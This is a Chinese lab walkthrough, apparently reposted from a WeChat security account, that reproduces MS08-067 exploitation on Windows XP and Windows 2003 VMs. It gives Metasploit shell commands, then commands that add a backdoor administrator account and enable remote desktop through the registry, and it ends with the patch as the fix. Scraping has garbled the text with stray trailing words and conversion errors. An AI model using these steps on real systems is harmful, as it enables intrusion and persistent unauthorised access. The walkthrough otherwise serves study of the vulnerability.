WinXP的MS08-067漏洞利用復現和解決方案

點擊上方藍字關注咱們linux


本期文章背景shell


本期文章由華章IT贊助,未經容許,禁止轉發,本篇筆記內容來源於書籍《kali Linux 高級滲透測試》,若有須要,能夠購買閱讀。數據庫

本篇筆記做者:k0xx1   編輯:天均 排版:天均windows

公衆號二維碼部分api






漏洞利用前準備

尋找漏洞

·CVE https://cve.mitre.org/安全

Common Vulnerabilities & Exposures公共漏洞和暴露, 由MITRE 1999年發起以社區做爲努力方向微信

·NVD https://nvd.nist.gov/網絡

美國國家通用漏洞數據庫,National Institute of Standards and Technology (NIST) 2005年發起.app

·CNVD運維

CNVD是國家信息安全漏洞共享平臺,英文是China National Vulnerability Database,隸屬於國家計算機網絡應急技術處理協調中心(CNCERT),CNCERT則是工信部的下屬單位。

·CNNVD http://www.cnnvd.org.cn/

CNNVD是中國國家信息安全漏洞庫,英文名稱China National Vulnerability Database of Information Security,簡稱CNNVD,隸屬於中國信息安全測評中心(通常簡稱國測,國測的主管單位是Security部),是中國信息安全測評中心爲切實履行漏洞分析和風險評估的職能,負責建設運維的國家級信息安全漏洞庫,爲我國信息安全保障提供基礎服務。

·MSRC https://docs.microsoft.com/en-us/security-updates/

Microsoft Security Response Center (微軟安全應急響應中心)提供的 Security Advisories and Bulletins安全警告和公告

咱們今天要介紹的就是MS08-067,看名稱就能夠知道,是在08年的第67個公告 https://docs.microsoft.com/en-us/security-updates/securitybulletins/2008/ms08-067

虛擬機安裝

須要的文件

·各類虛擬機系統: 自備        

·純淨版WinXPSP3:winxp-sp3 English(winxpensp3)

·Kali Linux 虛擬機文件: kali-linux-2020.2-vmware-amd64.7z (默認用戶名密碼不是root/toor而是kali/kali)

安裝過程(略)



·記得將虛擬機的網卡都設置爲橋接模式

·WinXP系統管理員(Administrator)密碼能夠設置爲複雜密碼

·WinXP初次啓動畫面選擇不啓動自動更新,第一個用戶名隨便填寫

·WinXP啓動後關閉Windows自帶防火牆

·Kali若是不是用虛擬機鏡像而是ISO嚮導安裝,建議默認安裝區域和語言都選擇美國英語,而後參考下面的中文支持,不然對通常用戶很麻煩。

·Kali使用默認的qterminal

·Kali中文支持

o打開終端

osudo dpkg-reconfigure locales裏面選擇en_US.UTF-八、zh_CN.GBK、zh_CN.UTF-8,用空格選定,用Tab選擇OK回車

o默認環境能夠選擇zh_CN.UTF-8也能夠選擇en_US.UTF-8

o更新包爲最新內容 sudo apt-get update ,有些人也能夠選擇更新到國內源,只是須要修改/etc/apt/sources.list的源內容,具體能夠提issue詢問如何修改

o安裝默認桌面環境須要的字體sudo apt-get install xfonts-intl-chinese ttf-wqy-microhei

o重啓Kali -> reboot

攻擊者ip爲192.168.1.102

被攻擊的ip爲192.168.1.128

03漏洞利用


嗅探端口看看445端口開了沒


看到確實開放了445端口也就是SMB


系統滲透

·進入msf終端

kali@kali:~$ msfconsole

·搜索ms08_067漏洞信息

msf5 > search ms08_067

·選擇利用此漏洞

msf5 > use exploit/windows/smb/ms08_067_netapi

·設置payload

輸入 show payloads

msf5 exploit(windows/smb/ms08_067_netapi) > set payload generic/shell_reverse_tcp

·設置target爲XP2001

msf exploit(windows/smb/ms08_067_netapi) > set target 6

·設置目標機器IP地址

msf exploit(windows/smb/ms08_067_netapi) > set RHOST "192.168.1.128"

·查看當前滲透選項

msf exploit(windows/smb/ms08_067_netapi) > show options

·開始滲透

這樣就已經成功拿到Windows Shell


漏洞利用

建立Windows用戶,用戶名爲someone 密碼爲12345678

命令 net user someone 12345678 /add

命令成功完成。

將用戶someone加入管理員組

命令 net localgroup administrators someone /add        


命令成功完成

·修改註冊表開啓遠程訪問

命令 REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

操做成功結束        

此時用netstat -an能夠看到3389端口開啓,說明已經有效了        

這樣咱們能夠用遠程桌面鏈接了 例如

rdesktop 192.168.1.128

04 解決方案

升級到最新的Windows系統

安裝KB958644補丁        



Wi
n2003的MS08-067漏洞利用復現和解決方案

漏洞利用前準備

尋找漏洞

·CVE https://cve.mitre.org/

Common Vulnerabilities & Exposures公共漏洞和暴露, 由MITRE 1999年發起以社區做爲努力方向

·NVD https://nvd.nist.gov/

美國國家通用漏洞數據庫,National Institute of Standards and Technology (NIST) 2005年發起.

·CNVD

CNVD是國家信息安全漏洞共享平臺,英文是China National Vulnerability Database,隸屬於國家計算機網絡應急技術處理協調中心(CNCERT),CNCERT則是工信部的下屬單位。

·CNNVD http://www.cnnvd.org.cn/

CNNVD是中國國家信息安全漏洞庫,英文名稱China National Vulnerability Database of Information Security,簡稱CNNVD,隸屬於中國信息安全測評中心(通常簡稱國測,國測的主管單位是Security部),是中國信息安全測評中心爲切實履行漏洞分析和風險評估的職能,負責建設運維的國家級信息安全漏洞庫,爲我國信息安全保障提供基礎服務。

·MSRC https://docs.microsoft.com/en-us/security-updates/

Microsoft Security Response Center (微軟安全應急響應中心)提供的 Security Advisories and Bulletins安全警告和公告

咱們今天要介紹的就是MS08-067,看名稱就能夠知道,是在08年的第67個公告 https://docs.microsoft.com/en-us/security-updates/securitybulletins/2008/ms08-067

虛擬機安裝

須要的文件

·各類虛擬機系統: 自備

·Win2003虛擬機:Win2K3 Metasploit

·Kali Linux 虛擬機文件: kali-linux-2020.2-vmware-amd64.7z (默認用戶名密碼不是root/toor而是kali/kali)

安裝過程(略)

·記得將虛擬機的網卡都設置爲橋接模式

·Win2003系統管理員(Administrator)密碼能夠設置爲複雜密碼

·Win2003初次啓動畫面選擇不啓動自動更新,第一個用戶名隨便填寫

·Win2003啓動後關閉Windows自帶防火牆

·Kali若是不是用虛擬機鏡像而是ISO嚮導安裝,建議默認安裝區域和語言都選擇美國英語,而後參考下面的中文支持,不然對通常用戶很麻煩。

·Kali使用xfce Terminal而不是默認的qterminal

0x03 漏洞利用

機器地址

攻擊者ip 192.168.1.105

被攻者IP 192.168.1.128


嗅探端口
看看445端口開放沒

kali@kali:~$ nmap -PS 192.138.1.128

看到確實開放了445端口也就是SMB

系統滲透

·進入msf終端

kali@kali:~$ msfconsole

·搜索ms08_067漏洞信息

msf5 > search ms08_067


·選擇利用此漏洞

msf5 > use exploit/windows/smb/ms08_067_netapi

·設置payload

msf5 exploit(windows/smb/ms08_067_netapi) > set payload "generic/shell_bind_tcp"

·設置target爲win2003-english,我這裏不知道他是哪一個因此填0        

msf5 exploit(windows/smb/ms08_067_netapi) > set target 0


·設置目標機器和被攻擊機器IP地址RHOST-被攻擊LHOST-攻擊機器

msf5 exploit(windows/smb/ms08_067_netapi) > set RHOST "192.168.1.128"

msf5 exploit(windows/smb/ms08_067_netapi) > set LHOST"192.168.1.108"

·查看當前滲透選項

msf5 exploit(windows/smb/ms08_067_netapi) > show options


開始滲透

這樣就已經成功拿到Windows Shell


漏洞利用

建立Windows用戶,用戶名爲someone 密碼爲12345678

命令 net user someone 12345678 /add

命令成功完成

將用戶someone加入管理員組

命令net localgroup administrators someone /add

命令成功完成。

修改註冊表開啓遠程訪問

命令REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

操做成功結束


此時用netstat -an能夠看到3389端口開啓,說明已經有效了


這樣咱們能夠用遠程桌面鏈接了 例如


rdesktop 192.168.1.128


0x04 解決方案

升級到最新的Windows系統

安裝KB958644補丁



本文分享自微信公衆號 - 滲透雲筆記(shentouyun)。
若有侵權,請聯繫 support@oschina.cn 刪除。
本文參與「OSC源創計劃」,歡迎正在閱讀的你也加入,一塊兒分享。

相關文章
相關標籤/搜索